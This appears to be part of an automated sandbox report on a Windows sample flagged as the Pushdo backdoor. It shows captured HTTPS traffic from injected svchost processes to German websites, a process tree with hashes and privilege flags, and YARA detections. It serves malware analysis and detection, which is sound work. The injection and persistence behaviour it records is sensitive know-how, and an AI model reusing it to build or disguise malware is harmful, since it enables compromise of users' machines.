                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1516INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1532INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        98192.168.2.658297185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1535OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1535INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:21 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1536INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        99192.168.2.6583515.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1536OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:21 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1537INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1553INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1569INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1585INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:07:54:08
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:153884 bytes
                                                                                                                                                                                                                                                                        MD5 hash:3E7A4148F1133CB4B8A097FD74590F44
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000000.00000002.607986528.0000000010004000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000000.00000002.571934007.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                        Start time:07:54:28
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:153884 bytes
                                                                                                                                                                                                                                                                        MD5 hash:3E7A4148F1133CB4B8A097FD74590F44
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000002.00000002.608690490.0000000010004000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000002.00000002.567367147.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 52%, ReversingLabs
                                                                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                        Start time:07:54:36
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:153884 bytes
                                                                                                                                                                                                                                                                        MD5 hash:3E7A4148F1133CB4B8A097FD74590F44
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000006.00000002.607161240.0000000010004000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000006.00000002.567130920.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                        Start time:07:55:13
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                        Start time:07:55:17
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                        Start time:07:55:25
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                        Start time:07:55:35
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                                        Start time:07:55:37
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                        Start time:07:55:40
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                                                        Start time:07:55:45
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                                                        Start time:07:55:46
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                                                        Start time:07:55:46
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                                                        Start time:07:55:51
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                        Start time:07:55:51
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                                                        Start time:07:55:52
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                                                        Start time:07:55:54
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                                                        Start time:07:55:58
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                                                        Start time:07:56:09
                                                                                                                                                                                                                                                                        Start date:10/03/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x3c0000
                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:28.5%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:89.1%
                                                                                                                                                                                                                                                                          Signature Coverage:24.8%
                                                                                                                                                                                                                                                                          Total number of Nodes:1498
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:31
